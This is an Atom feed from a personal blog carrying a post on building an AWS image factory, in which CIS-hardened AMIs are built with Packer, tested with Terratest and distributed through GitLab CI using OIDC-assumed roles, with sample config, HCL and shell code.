<?xml version="1.0" encoding="utf-8"?><feed xmlns="http://www.w3.org/2005/Atom" ><generator uri="https://jekyllrb.com/" version="4.4.1">Jekyll</generator><link href="https://rosesecurity.cloud/feed.xml" rel="self" type="application/atom+xml" /><link href="https://rosesecurity.cloud/" rel="alternate" type="text/html" /><updated>2026-06-08T05:47:32+00:00</updated><id>https://rosesecurity.cloud/feed.xml</id><title type="html">rosecurity@cloud</title><subtitle>i make the terraform which is like when you terraform mars but for computers and i write go lang which is google language for going fast and i maintain modules which are like modular furniture but for the cloud which is where data lives in the sky and i do machine learning pipelines which is when the machine learns about pipes and i build ML platforms which stands for machine learning but also could be maximum likelihood or maybe municipal library anyway its scalable which means it can scale like a fish but in the cloud which is AWS or AZURE or google cloud which is where the googles live i live in the CLI which is command line interface but also could be clitoris but no its the terminal which is like the airport but for commands and i created red teaming which is when you team up with red people to hack the mainframe and im a mitre contributor which is the hat that bishops wear but for security and OWASP which is when you get wasped by a OWL and debian which is like saying damn but with a B i write blogs which are like logs but for the web and if you enjoy my code which is community code because its for the community please reach out and connect which is what we do on linkedin which is the professional facebook but with more people lying about their skills anyway thanks for reading this is my bio and i hope you like it and please hire me or give me money or stars on github which are like real stars but smaller and on a website</subtitle><entry><title type="html">Building an AWS Image Factory with Packer and Terratest</title><link href="https://rosesecurity.cloud/2026/05/20/building-an-image-factory.html" rel="alternate" type="text/html" title="Building an AWS Image Factory with Packer and Terratest" /><published>2026-05-20T00:00:00+00:00</published><updated>2026-05-20T00:00:00+00:00</updated><id>https://rosesecurity.cloud/2026/05/20/building-an-image-factory</id><content type="html" xml:base="https://rosesecurity.cloud/2026/05/20/building-an-image-factory.html"><![CDATA[<p>Sorry I’ve been quiet lately. My head has been down on my newest adventure. I’m so used to being the sole operator, platform engineer, SRE, or whatever that day brings that it’s odd to take a step back and be tasked with providing enterprise cybersecurity for cloud environments that other teams are operating. I’ve had so many cool new projects that will make for some great technical blogs, so I figured I would start with this one. The idea is simple: how do you provide your organization with hardened operating systems that teams can actually deploy into the cloud? A lot of compliance terms and frameworks get tossed around, but the vision is this: how do you provide an image factory of CIS-hardened AMIs, bake in a custom baseline of tools, and share those images across numerous AWS accounts and organizations?</p>

<p>Here is my approach, the downfalls, the unknowns, and the fun parts. I apologize in advance that this is very GitLab centric CI/CD, but if you like the design, feel free to port it over to your source control system of choice.</p>

<h2 id="scaffolding">Scaffolding</h2>

<p>The repository starts with the boring stuff first, because the boring stuff is what keeps the project usable after the first week. Besides <code class="language-plaintext highlighter-rouge">.gitignore</code> and <code class="language-plaintext highlighter-rouge">.gitattributes</code>, there is a short <code class="language-plaintext highlighter-rouge">README.md</code>, a <code class="language-plaintext highlighter-rouge">Brewfile</code> for local tooling, an <code class="language-plaintext highlighter-rouge">.editorconfig</code>, a <code class="language-plaintext highlighter-rouge">SECURITY.md</code>, and the usual <code class="language-plaintext highlighter-rouge">.gitlab/merge_request_templates</code> and <code class="language-plaintext highlighter-rouge">.gitlab/issue_templates</code> so reviews and issues don’t turn into archaeology.</p>

<p>A small <code class="language-plaintext highlighter-rouge">Makefile</code> covers common local commands, but <code class="language-plaintext highlighter-rouge">.pre-commit-config.yaml</code> does most of the early heavy lifting. It gives the repo one place for file hygiene, formatting checks, and basic guardrails before anything gets near CI. Here’s the first pass of hooks for the Image Factory.</p>

<div class="language-yaml highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1"># See https://pre-commit.com for more information</span>
<span class="c1"># See https://pre-commit.com/hooks.html for more hooks</span>
<span class="na">repos</span><span class="pi">:</span>
  <span class="pi">-</span> <span class="na">repo</span><span class="pi">:</span> <span class="s">https://github.com/pre-commit/pre-commit-hooks</span>
    <span class="na">rev</span><span class="pi">:</span> <span class="s">v5.0.0</span>
    <span class="na">hooks</span><span class="pi">:</span>
      <span class="pi">-</span> <span class="na">id</span><span class="pi">:</span> <span class="s">end-of-file-fixer</span>
      <span class="pi">-</span> <span class="na">id</span><span class="pi">:</span> <span class="s">check-merge-conflict</span>
      <span class="pi">-</span> <span class="na">id</span><span class="pi">:</span> <span class="s">trailing-whitespace</span>
        <span class="na">args</span><span class="pi">:</span> <span class="pi">[</span><span class="nv">--markdown-linebreak-ext=md</span><span class="pi">]</span>
      <span class="pi">-</span> <span class="na">id</span><span class="pi">:</span> <span class="s">check-shebang-scripts-are-executable</span>

      <span class="c1"># YAML</span>
      <span class="pi">-</span> <span class="na">id</span><span class="pi">:</span> <span class="s">check-yaml</span>

      <span class="c1"># Cross platform</span>
      <span class="pi">-</span> <span class="na">id</span><span class="pi">:</span> <span class="s">check-case-conflict</span>
      <span class="pi">-</span> <span class="na">id</span><span class="pi">:</span> <span class="s">mixed-line-ending</span>
        <span class="na">args</span><span class="pi">:</span> <span class="pi">[</span><span class="nv">--fix=lf</span><span class="pi">]</span>

  <span class="pi">-</span> <span class="na">repo</span><span class="pi">:</span> <span class="s">local</span>
    <span class="na">hooks</span><span class="pi">:</span>
      <span class="pi">-</span> <span class="na">id</span><span class="pi">:</span> <span class="s">packer-fmt</span>
        <span class="na">name</span><span class="pi">:</span> <span class="s">Packer format check</span>
        <span class="na">entry</span><span class="pi">:</span> <span class="s">packer fmt -check -recursive packer</span>
        <span class="na">language</span><span class="pi">:</span> <span class="s">system</span>
        <span class="na">files</span><span class="pi">:</span> <span class="s">^packer/.*\.pkr\.hcl$</span>
        <span class="na">pass_filenames</span><span class="pi">:</span> <span class="kc">false</span>

      <span class="pi">-</span> <span class="na">id</span><span class="pi">:</span> <span class="s">shellcheck</span>
        <span class="na">name</span><span class="pi">:</span> <span class="s">ShellCheck</span>
        <span class="na">entry</span><span class="pi">:</span> <span class="s">shellcheck</span>
        <span class="na">language</span><span class="pi">:</span> <span class="s">system</span>
        <span class="na">types</span><span class="pi">:</span> <span class="pi">[</span><span class="nv">shell</span><span class="pi">]</span>
</code></pre></div></div>

<p>That runs on every commit and removes a lot of pointless review noise. If Packer formatting or shell linting is broken, I want the hook to catch it before a reviewer has to.</p>

<blockquote>
  <p>Side note, I typically have a dedicated <code class="language-plaintext highlighter-rouge">pre-commit</code> CI job for making sure everything passes as a prerequisite to other pipelines.</p>
</blockquote>

<p>The repo also has a <code class="language-plaintext highlighter-rouge">docs</code> directory for the usual odds and ends: architecture notes, decision records, and diagrams.</p>

<h2 id="aws-prerequisites">AWS Prerequisites</h2>

<p>Before the repo can build anything useful, AWS needs a few pieces in place. If the AMIs use encrypted EBS volumes, the KMS key policy has to let the build account use the key and let consumer accounts launch from the shared AMIs. You also need the normal network plumbing: VPC, subnets, routing, security groups, and outbound access so temporary build and test instances can pull updates, download packages, reach SSM, and install whatever baseline tooling your organization requires.</p>

<p>An optional AMI reaper Lambda is worth adding early. Failed builds, superseded images, and half-finished experiments shouldn’t live forever. If the pipeline tags images during build, test, and publish, cleanup can be driven from those tags instead of guessing (thank you boto3).</p>

<p>The last prerequisite is identity. Packer, Terratest, and publishing should each have an IAM role, and CI should use OIDC to assume those roles. Long-lived AWS keys in CI variables are one of those things that feel convenient right up until they become an incident, and they make me feel like I need a shower if I have to use them.</p>

<h2 id="codebase-structure">Codebase Structure</h2>

<p>The layout is intentionally boring. Each image gets its own Packer root under <code class="language-plaintext highlighter-rouge">packer/images/&lt;provider&gt;/&lt;image&gt;</code>, and each root owns the same four files: <code class="language-plaintext highlighter-rouge">versions.pkr.hcl</code>, <code class="language-plaintext highlighter-rouge">variables.pkr.hcl</code>, <code class="language-plaintext highlighter-rouge">sources.pkr.hcl</code>, and <code class="language-plaintext highlighter-rouge">build.pkr.hcl</code>. When someone adds another operating system, the plugin versions, inputs, AMI lookup logic, and hardening steps all have a known place to live.</p>

<div class="language-console highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="go">├── account-map.yaml
├── Brewfile
├── docs
├── Makefile
├── packer
│   ├── images
│   │   └── aws
│   │       ├── al2023
│   │       │   ├── build.pkr.hcl
│   │       │   ├── sources.pkr.hcl
│   │       │   ├── variables.pkr.hcl
│   │       │   └── versions.pkr.hcl
│   │       └── ubuntu24.04
│   │           ├── build.pkr.hcl
│   │           ├── sources.pkr.hcl
│   │           ├── variables.pkr.hcl
│   │           └── versions.pkr.hcl
├── README.md
├── scripts
│   ├── build.sh
│   └── gitlab
│       └── detect-packer-changes.sh
├── SECURITY.md
└── tests
    ├── terraform
    │   ├── main.tf
    │   ├── outputs.tf
    │   ├── providers.tf
    │   ├── README.md
    │   ├── variables.tf
    │   └── versions.tf
    └── terratest
        ├── build_test.go
        ├── checks
        │   ├── al2023-cis-level1.yaml
        │   └── ubuntu24.04-cis-level1.yaml
        ├── go.mod
        └── go.sum
</span></code></pre></div></div>

<p>The other important root-level file is <code class="language-plaintext highlighter-rouge">account-map.yaml</code>. It lists the consumer AWS accounts that should receive launch permissions after an AMI passes testing. I prefer keeping that as data in the repo instead of hiding it in CI variables. A merge request should show exactly who is being added or removed from the distribution list.</p>

<h2 id="building-the-image">Building the Image</h2>

<p>The build wrapper stays small. It takes a Packer environment through <code class="language-plaintext highlighter-rouge">PKR_ENV</code>, initializes that image root, checks the template, and writes the final manifest into <code class="language-plaintext highlighter-rouge">artifacts/</code>. The local command and the CI command are the same thing, which makes build failures much easier to reproduce.</p>

<div class="language-sh highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c">#!/usr/bin/env bash</span>

<span class="nb">set</span> <span class="nt">-euo</span> pipefail

: <span class="s2">"</span><span class="k">${</span><span class="nv">PKR_ENV</span>:?<span class="p"> PKR_ENV is required</span><span class="k">}</span><span class="s2">"</span>
<span class="k">if</span> <span class="o">!</span> <span class="nb">command</span> <span class="nt">-v</span> <span class="s2">"packer"</span> &amp;&gt;/dev/null<span class="p">;</span> <span class="k">then
  </span><span class="nb">echo</span> <span class="s2">"Error: Packer is not installed."</span>
  <span class="nb">exit </span>1
<span class="k">fi

</span><span class="nb">echo</span> <span class="s2">"Initializing Packer environment in </span><span class="nv">$PKR_ENV</span><span class="s2">"</span>
packer init <span class="s2">"</span><span class="nv">$PKR_ENV</span><span class="s2">"</span>

<span class="nb">echo</span> <span class="s2">"Checking Packer configuration formatting..."</span>
packer <span class="nb">fmt</span> <span class="nt">-check</span> <span class="s2">"</span><span class="nv">$PKR_ENV</span><span class="s2">"</span>

<span class="nb">echo</span> <span class="s2">"Validating Packer configurations..."</span>
packer validate <span class="s2">"</span><span class="nv">$PKR_ENV</span><span class="s2">"</span>

<span class="nb">echo</span> <span class="s2">"Building Packer image..."</span>
<span class="nb">mkdir</span> <span class="nt">-p</span> artifacts
packer build <span class="nt">-on-error</span><span class="o">=</span>cleanup <span class="s2">"</span><span class="nv">$PKR_ENV</span><span class="s2">"</span>
</code></pre></div></div>

<p>For AL2023, the Packer source starts by finding the base AMI, creating a timestamped name, and tagging the AMI and snapshots with enough metadata to make cleanup and audit work sane. Tags like <code class="language-plaintext highlighter-rouge">ImageFactoryManaged</code>, <code class="language-plaintext highlighter-rouge">ImageFactoryPublished</code>, <code class="language-plaintext highlighter-rouge">BaseImageProduct</code>, and <code class="language-plaintext highlighter-rouge">SourceAmi</code> give you a quick answer to what created the image, what it was based on, and whether it has been released.</p>

<div class="language-hcl highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nx">locals</span> <span class="p">{</span>
  <span class="nx">build_timestamp</span> <span class="o">=</span> <span class="nx">regex_replace</span><span class="p">(</span><span class="nx">timestamp</span><span class="p">(),</span> <span class="s2">"[- TZ:]"</span><span class="p">,</span> <span class="s2">""</span><span class="p">)</span>
  <span class="nx">cis_product</span>     <span class="o">=</span> <span class="s2">"CIS Hardened Image Level 1 on Amazon Linux 2023"</span>

  <span class="nx">ami_name</span> <span class="o">=</span> <span class="nx">var</span><span class="p">.</span><span class="nx">ami_name</span> <span class="o">!=</span> <span class="s2">""</span> <span class="o">?</span> <span class="nx">var</span><span class="p">.</span><span class="nx">ami_name</span> <span class="o">:</span> <span class="nx">format</span><span class="p">(</span>
    <span class="s2">"%s-%s-%s"</span><span class="p">,</span>
    <span class="nx">var</span><span class="p">.</span><span class="nx">ami_name_prefix</span><span class="p">,</span>
    <span class="nx">var</span><span class="p">.</span><span class="nx">cis_marketplace_version</span><span class="p">,</span>
    <span class="nx">local</span><span class="p">.</span><span class="nx">build_timestamp</span><span class="p">,</span>
  <span class="p">)</span>

  <span class="nx">common_tags</span> <span class="o">=</span> <span class="nx">merge</span><span class="p">(</span>
    <span class="p">{</span>
      <span class="nx">Name</span>                  <span class="o">=</span> <span class="nx">local</span><span class="p">.</span><span class="nx">ami_name</span>
      <span class="nx">BaseImageProduct</span>      <span class="o">=</span> <span class="nx">local</span><span class="p">.</span><span class="nx">cis_product</span>
      <span class="nx">BaseImageVersion</span>      <span class="o">=</span> <span class="nx">var</span><span class="p">.</span><span class="nx">cis_marketplace_version</span>
      <span class="nx">CisBenchmarkLevel</span>     <span class="o">=</span> <span class="s2">"1"</span>
      <span class="nx">ImageFactoryManaged</span>   <span class="o">=</span> <span class="s2">"true"</span>
      <span class="nx">ImageFactoryPublished</span> <span class="o">=</span> <span class="s2">"false"</span>
      <span class="nx">SourceAmi</span>             <span class="o">=</span> <span class="nx">data</span><span class="err">.</span><span class="nx">amazon-ami</span><span class="p">.</span><span class="nx">this</span><span class="p">.</span><span class="nx">id</span>
    <span class="p">},</span>
    <span class="nx">var</span><span class="p">.</span><span class="nx">tags</span><span class="p">,</span>
  <span class="p">)</span>
<span class="p">}</span>

<span class="nx">data</span> <span class="s2">"amazon-ami"</span> <span class="s2">"this"</span> <span class="p">{</span>
  <span class="nx">region</span>      <span class="o">=</span> <span class="nx">var</span><span class="p">.</span><span class="nx">aws_region</span>
  <span class="nx">owners</span>      <span class="o">=</span> <span class="nx">var</span><span class="p">.</span><span class="nx">source_ami_owners</span>
  <span class="nx">most_recent</span> <span class="o">=</span> <span class="nx">var</span><span class="p">.</span><span class="nx">source_ami_most_recent</span>

  <span class="nx">filters</span> <span class="o">=</span> <span class="nx">merge</span><span class="p">(</span>
    <span class="p">{</span>
      <span class="nx">architecture</span>        <span class="o">=</span> <span class="nx">var</span><span class="p">.</span><span class="nx">source_ami_architecture</span>
      <span class="nx">name</span>                <span class="o">=</span> <span class="nx">var</span><span class="p">.</span><span class="nx">source_ami_name_filter</span>
      <span class="nx">root-device-type</span>    <span class="o">=</span> <span class="s2">"ebs"</span>
      <span class="nx">virtualization-type</span> <span class="o">=</span> <span class="s2">"hvm"</span>
    <span class="p">},</span>
    <span class="nx">var</span><span class="p">.</span><span class="nx">source_ami_product_code</span> <span class="o">!=</span> <span class="s2">""</span> <span class="o">?</span> <span class="p">{</span> <span class="nx">product-code</span> <span class="o">=</span> <span class="nx">var</span><span class="p">.</span><span class="nx">source_ami_product_code</span> <span class="p">}</span> <span class="o">:</span> <span class="p">{},</span>
  <span class="p">)</span>
<span class="p">}</span>
</code></pre></div></div>

<p>The <code class="language-plaintext highlighter-rouge">amazon-ebs</code> source uses SSM Session Manager as the communicator. It sounds like a small choice, but it changes the operating model quite a bit. I don’t need to punch SSH ingress into a build subnet, pass key pairs around, or explain why a temporary builder was reachable from the internet. The instance gets temporary SSM permissions, Packer connects through Session Manager, and the build network can stay private.</p>

<div class="language-hcl highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nx">source</span> <span class="s2">"amazon-ebs"</span> <span class="s2">"al2023"</span> <span class="p">{</span>
  <span class="nx">ami_description</span>             <span class="o">=</span> <span class="nx">var</span><span class="p">.</span><span class="nx">ami_description</span>
  <span class="nx">ami_name</span>                    <span class="o">=</span> <span class="nx">local</span><span class="p">.</span><span class="nx">ami_name</span>
  <span class="nx">ami_regions</span>                 <span class="o">=</span> <span class="nx">var</span><span class="p">.</span><span class="nx">ami_regions</span>
  <span class="nx">associate_public_ip_address</span> <span class="o">=</span> <span class="nx">var</span><span class="p">.</span><span class="nx">associate_public_ip_address</span>
  <span class="nx">encrypt_boot</span>                <span class="o">=</span> <span class="nx">var</span><span class="p">.</span><span class="nx">encrypt_boot</span>
  <span class="nx">instance_type</span>               <span class="o">=</span> <span class="nx">var</span><span class="p">.</span><span class="nx">instance_type</span>
  <span class="nx">kms_key_id</span>                  <span class="o">=</span> <span class="nx">var</span><span class="p">.</span><span class="nx">kms_key_id</span>
  <span class="nx">region</span>                      <span class="o">=</span> <span class="nx">var</span><span class="p">.</span><span class="nx">aws_region</span>
  <span class="nx">source_ami</span>                  <span class="o">=</span> <span class="nx">data</span><span class="p">.</span><span class="nx">amazon-ami</span><span class="p">.</span><span class="nx">this</span><span class="p">.</span><span class="nx">id</span>

  <span class="nx">communicator</span>     <span class="o">=</span> <span class="s2">"ssh"</span>
  <span class="nx">pause_before_ssm</span> <span class="o">=</span> <span class="s2">"30s"</span>
  <span class="nx">ssh_interface</span>    <span class="o">=</span> <span class="s2">"session_manager"</span>
  <span class="nx">ssh_timeout</span>      <span class="o">=</span> <span class="nx">var</span><span class="err">.</span><span class="nx">ssh_timeout</span>
  <span class="nx">ssh_username</span>     <span class="o">=</span> <span class="nx">var</span><span class="p">.</span><span class="nx">ssh_username</span>

  <span class="nx">launch_block_device_mappings</span> <span class="p">{</span>
    <span class="nx">delete_on_termination</span> <span class="o">=</span> <span class="kc">true</span>
    <span class="nx">device_name</span>           <span class="o">=</span> <span class="s2">"/dev/xvda"</span>
    <span class="nx">encrypted</span>             <span class="o">=</span> <span class="nx">var</span><span class="p">.</span><span class="nx">encrypt_boot</span>
    <span class="nx">kms_key_id</span>            <span class="o">=</span> <span class="nx">var</span><span class="p">.</span><span class="nx">kms_key_id</span>
    <span class="nx">volume_size</span>           <span class="o">=</span> <span class="nx">var</span><span class="p">.</span><span class="nx">root_volume_size</span>
    <span class="nx">volume_type</span>           <span class="o">=</span> <span class="nx">var</span><span class="p">.</span><span class="nx">root_volume_type</span>
  <span class="p">}</span>

  <span class="nx">run_tags</span>      <span class="o">=</span> <span class="nx">merge</span><span class="p">(</span><span class="nx">local</span><span class="p">.</span><span class="nx">common_tags</span><span class="p">,</span> <span class="p">{</span> <span class="nx">ImageFactoryStage</span> <span class="o">=</span> <span class="s2">"build"</span> <span class="p">})</span>
  <span class="nx">snapshot_tags</span> <span class="o">=</span> <span class="nx">local</span><span class="p">.</span><span class="nx">common_tags</span>
  <span class="nx">tags</span>          <span class="o">=</span> <span class="nx">local</span><span class="p">.</span><span class="nx">common_tags</span>
<span class="p">}</span>
</code></pre></div></div>

<p>The hardening layer uses shell in this version because the first pass needed to stay readable and close to the AMI lifecycle. This is just an example baseline. In practice, you could start from an AWS Marketplace image that already comes hardened and layer your custom tooling on top. You could also move the hardening logic into Ansible if that fits your team better. The shape is the same either way: install the baseline agent, apply the deltas, enable the services, clean the machine, and seal it.</p>

<div class="language-hcl highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nx">build</span> <span class="p">{</span>
  <span class="nx">sources</span> <span class="o">=</span> <span class="p">[</span><span class="s2">"source.amazon-ebs.al2023"</span><span class="p">]</span>

  <span class="nx">provisioner</span> <span class="s2">"shell"</span> <span class="p">{</span>
    <span class="nx">inline_shebang</span> <span class="o">=</span> <span class="s2">"/bin/bash -e"</span>

    <span class="nx">environment_vars</span> <span class="o">=</span> <span class="p">[</span>
      <span class="s2">"UPDATE_PACKAGES=${var.update_packages}"</span><span class="p">,</span>
    <span class="p">]</span>

    <span class="nx">inline</span> <span class="o">=</span> <span class="p">[</span>
      <span class="s2">"set -euo pipefail"</span><span class="p">,</span>
      <span class="s2">"if [ </span><span class="se">\"</span><span class="s2">$UPDATE_PACKAGES</span><span class="se">\"</span><span class="s2"> = </span><span class="se">\"</span><span class="s2">true</span><span class="se">\"</span><span class="s2"> ]; then sudo dnf update -y; fi"</span><span class="p">,</span>
      <span class="s2">"if ! rpm -q amazon-ssm-agent &gt;/dev/null 2&gt;&amp;1; then sudo dnf install -y amazon-ssm-agent; fi"</span><span class="p">,</span>
      <span class="s2">"if ! rpm -q rsyslog &gt;/dev/null 2&gt;&amp;1; then sudo dnf install -y rsyslog; fi"</span><span class="p">,</span>
      <span class="s2">"printf '%s</span><span class="err">\\</span><span class="s2">n' 'install cramfs /bin/false' 'blacklist cramfs' | sudo tee /etc/modprobe.d/cramfs.conf &gt;/dev/null"</span><span class="p">,</span>
      <span class="s2">"printf '%s</span><span class="err">\\</span><span class="s2">n' 'net.ipv4.conf.all.accept_redirects = 0' 'net.ipv4.conf.default.accept_redirects = 0' | sudo tee /etc/sysctl.d/99-imagefactory-hardening.conf &gt;/dev/null"</span><span class="p">,</span>
      <span class="s2">"sudo sysctl -p /etc/sysctl.d/99-imagefactory-hardening.conf"</span><span class="p">,</span>
      <span class="s2">"sudo mkdir -p /etc/ssh/sshd_config.d"</span><span class="p">,</span>
      <span class="s2">"printf '%s</span><span class="err">\\</span><span class="s2">n' 'PermitRootLogin no' 'PermitEmptyPasswords no' | sudo tee /etc/ssh/sshd_config.d/10-imagefactory-hardening.conf &gt;/dev/null"</span><span class="p">,</span>
      <span class="s2">"sudo chmod 600 /etc/ssh/sshd_config.d/10-imagefactory-hardening.conf"</span><span class="p">,</span>
      <span class="s2">"printf '%s</span><span class="err">\\</span><span class="s2">n' 'umask 027' | sudo tee /etc/profile.d/99-imagefactory-umask.sh &gt;/dev/null"</span><span class="p">,</span>
      <span class="s2">"sudo chmod 644 /etc/profile.d/99-imagefactory-umask.sh"</span><span class="p">,</span>
      <span class="s2">"sudo systemctl enable --now amazon-ssm-agent"</span><span class="p">,</span>
      <span class="s2">"sudo systemctl enable --now rsyslog"</span><span class="p">,</span>
      <span class="s2">"sudo dnf clean all"</span><span class="p">,</span>
      <span class="s2">"sudo cloud-init clean --logs"</span><span class="p">,</span>
      <span class="s2">"sudo rm -f /etc/ssh/ssh_host_*"</span><span class="p">,</span>
    <span class="p">]</span>
  <span class="p">}</span>

  <span class="nx">post-processor</span> <span class="s2">"manifest"</span> <span class="p">{</span>
    <span class="nx">output</span>     <span class="o">=</span> <span class="s2">"artifacts/${var.ami_name_prefix}-manifest.json"</span>
    <span class="nx">strip_path</span> <span class="o">=</span> <span class="kc">true</span>
  <span class="p">}</span>
<span class="p">}</span>
</code></pre></div></div>

<p>The Ubuntu image follows the same pattern with <code class="language-plaintext highlighter-rouge">apt</code>, <code class="language-plaintext highlighter-rouge">snap</code>, a different username, and a different root device. AL2023 and Ubuntu aren’t identical, but the repo shape is close enough that a reviewer can find the operating-system-specific differences quickly.</p>

<h2 id="build-pipelines">Build Pipelines</h2>

<p>The parent pipeline has three stages: detect, dispatch, and secret detection. The detect job figures out which image roots changed, writes a small matrix artifact, and generates a child pipeline. The dispatch job starts that generated child pipeline. This keeps the parent pipeline fast without using a giant static matrix that rebuilds every image because one line changed in one Packer directory.</p>

<div class="language-yaml highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="na">stages</span><span class="pi">:</span>
  <span class="pi">-</span> <span class="s">detect</span>
  <span class="pi">-</span> <span class="s">dispatch</span>
  <span class="pi">-</span> <span class="s">secret-detection</span>

<span class="na">variables</span><span class="pi">:</span>
  <span class="na">SECRET_DETECTION_ENABLED</span><span class="pi">:</span> <span class="s2">"</span><span class="s">true"</span>
  <span class="na">PACKER_VERSION</span><span class="pi">:</span> <span class="s2">"</span><span class="s">1.15.1"</span>
  <span class="na">PACKER_BUILD_IMAGE</span><span class="pi">:</span> <span class="s2">"</span><span class="s">amazonlinux:2023"</span>
  <span class="na">AWS_REGION</span><span class="pi">:</span> <span class="s2">"</span><span class="s">us-east-2"</span>

<span class="na">include</span><span class="pi">:</span>
  <span class="pi">-</span> <span class="na">local</span><span class="pi">:</span> <span class="s">.gitlab/ci/detect/*.gitlab-ci.yml</span>
  <span class="pi">-</span> <span class="na">local</span><span class="pi">:</span> <span class="s">.gitlab/ci/dispatch/*.gitlab-ci.yml</span>
  <span class="pi">-</span> <span class="na">template</span><span class="pi">:</span> <span class="s">Security/Secret-Detection.gitlab-ci.yml</span>
</code></pre></div></div>

<p>The change detector compares the base and head SHAs, walks changed files under <code class="language-plaintext highlighter-rouge">packer/images/**</code>, finds the nearest directory containing <code class="language-plaintext highlighter-rouge">versions.pkr.hcl</code>, and emits a child pipeline job for each changed image. The generated job forwards variables like <code class="language-plaintext highlighter-rouge">PKR_ENV</code>, <code class="language-plaintext highlighter-rouge">PKR_IMAGE</code>, and <code class="language-plaintext highlighter-rouge">PKR_CHECKS_FILE</code>, so one provider pipeline can handle many image directories without copy and paste.</p>

<div class="language-sh highlighter-rouge"><div class="highlight"><pre class="highlight"><code>find_packer_root<span class="o">()</span> <span class="o">{</span>
  <span class="nv">path</span><span class="o">=</span><span class="s2">"</span><span class="nv">$1</span><span class="s2">"</span>
  <span class="nb">dir</span><span class="o">=</span><span class="s2">"</span><span class="k">${</span><span class="nv">path</span><span class="p">%/*</span><span class="k">}</span><span class="s2">"</span>

  <span class="k">while</span> <span class="o">[</span> <span class="s2">"</span><span class="nv">$dir</span><span class="s2">"</span> <span class="o">!=</span> <span class="s2">"."</span> <span class="o">]</span> <span class="o">&amp;&amp;</span> <span class="o">[</span> <span class="s2">"</span><span class="nv">$dir</span><span class="s2">"</span> <span class="o">!=</span> <span class="s2">"packer/images"</span> <span class="o">]</span><span class="p">;</span> <span class="k">do
    if</span> <span class="o">[</span> <span class="nt">-f</span> <span class="s2">"</span><span class="nv">$dir</span><span class="s2">/versions.pkr.hcl"</span> <span class="o">]</span><span class="p">;</span> <span class="k">then
      </span><span class="nb">printf</span> <span class="s1">'%s\n'</span> <span class="s2">"</span><span class="nv">$dir</span><span class="s2">"</span>
      <span class="k">return </span>0
    <span class="k">fi
    </span><span class="nb">dir</span><span class="o">=</span><span class="s2">"</span><span class="k">${</span><span class="nv">dir</span><span class="p">%/*</span><span class="k">}</span><span class="s2">"</span>
  <span class="k">done

  return </span>1
<span class="o">}</span>

checks_file<span class="o">()</span> <span class="o">{</span>
  <span class="k">case</span> <span class="s2">"</span><span class="nv">$1</span><span class="s2">"</span> <span class="k">in
    </span>al2023<span class="p">)</span>
      <span class="nb">printf</span> <span class="s1">'checks/al2023-cis-level1.yaml'</span>
      <span class="p">;;</span>
    ubuntu24.04<span class="p">)</span>
      <span class="nb">printf</span> <span class="s1">'checks/ubuntu24.04-cis-level1.yaml'</span>
      <span class="p">;;</span>
    <span class="k">*</span><span class="p">)</span>
      <span class="nb">printf</span> <span class="s1">'checks/al2023-cis-level1.yaml'</span>
      <span class="p">;;</span>
  <span class="k">esac</span>
<span class="o">}</span>
</code></pre></div></div>

<p>The AWS child pipeline is where the real lifecycle happens. It builds the AMI, extracts the Packer manifest, launches a test instance, runs hardening checks over SSM, and publishes only after those checks pass.</p>

<div class="language-yaml highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="na">stages</span><span class="pi">:</span>
  <span class="pi">-</span> <span class="s">build</span>
  <span class="pi">-</span> <span class="s">test</span>
  <span class="pi">-</span> <span class="s">publish</span>

<span class="na">packer:build</span><span class="pi">:</span>
  <span class="na">extends</span><span class="pi">:</span> <span class="s">.packer</span>
  <span class="na">stage</span><span class="pi">:</span> <span class="s">build</span>
  <span class="na">script</span><span class="pi">:</span>
    <span class="pi">-</span> <span class="s">./scripts/build.sh</span>
    <span class="pi">-</span> <span class="pi">|</span>
      <span class="s">manifest="$(find artifacts -type f -name '*-manifest.json' | sort | tail -n 1)"</span>
      <span class="s">artifact_ids="$(jq -r '[.builds[] | select(.artifact_id != null and .artifact_id != "") | .artifact_id] | last // ""' "$manifest")"</span>
      <span class="s">primary_artifact="${artifact_ids%%,*}"</span>
      <span class="s">ami_region="${primary_artifact%%:*}"</span>
      <span class="s">ami_id="${primary_artifact#*:}"</span>
      <span class="s">ami_name="$(aws ec2 describe-images --region "$ami_region" --image-ids "$ami_id" --query 'Images[0].Name' --output text)"</span>

      <span class="s">{</span>
        <span class="s">printf 'AMI_ARTIFACT_IDS=%s\n' "$artifact_ids"</span>
        <span class="s">printf 'AMI_REGION=%s\n' "$ami_region"</span>
        <span class="s">printf 'AMI_ID=%s\n' "$ami_id"</span>
        <span class="s">printf 'AMI_NAME=%s\n' "$ami_name"</span>
      <span class="s">} &gt; artifacts/packer.env</span>
  <span class="na">artifacts</span><span class="pi">:</span>
    <span class="na">reports</span><span class="pi">:</span>
      <span class="na">dotenv</span><span class="pi">:</span> <span class="s">artifacts/packer.env</span>
    <span class="na">paths</span><span class="pi">:</span>
      <span class="pi">-</span> <span class="s">artifacts/</span>

<span class="na">terratest:ami</span><span class="pi">:</span>
  <span class="na">extends</span><span class="pi">:</span> <span class="s">.terratest</span>
  <span class="na">stage</span><span class="pi">:</span> <span class="s">test</span>
  <span class="na">needs</span><span class="pi">:</span>
    <span class="pi">-</span> <span class="na">job</span><span class="pi">:</span> <span class="s">packer:build</span>
      <span class="na">artifacts</span><span class="pi">:</span> <span class="kc">true</span>
  <span class="na">script</span><span class="pi">:</span>
    <span class="pi">-</span> <span class="s">cd tests/terratest</span>
    <span class="pi">-</span> <span class="s">go test -v -timeout 45m . -args -ami_name "$AMI_NAME" -checks_file "${PKR_CHECKS_FILE:-checks/al2023-cis-level1.yaml}"</span>
</code></pre></div></div>

<p>The <code class="language-plaintext highlighter-rouge">artifacts/packer.env</code> file is the handoff between build and test. GitLab loads it as a dotenv report, so the test stage doesn’t have to parse the Packer manifest again. It gets the AMI name from the previous job and uses that as the input for the Terratest fixture.</p>

<p>The other part I care about is authentication. The build and test jobs use GitLab OIDC to assume an AWS role. No long-lived AWS access keys in CI, no local credentials pasted into variables, and no mystery user showing up in CloudTrail. The job writes the GitLab OIDC token to a file, exports <code class="language-plaintext highlighter-rouge">AWS_ROLE_ARN</code>, and lets the AWS SDK credential chain handle the rest.</p>

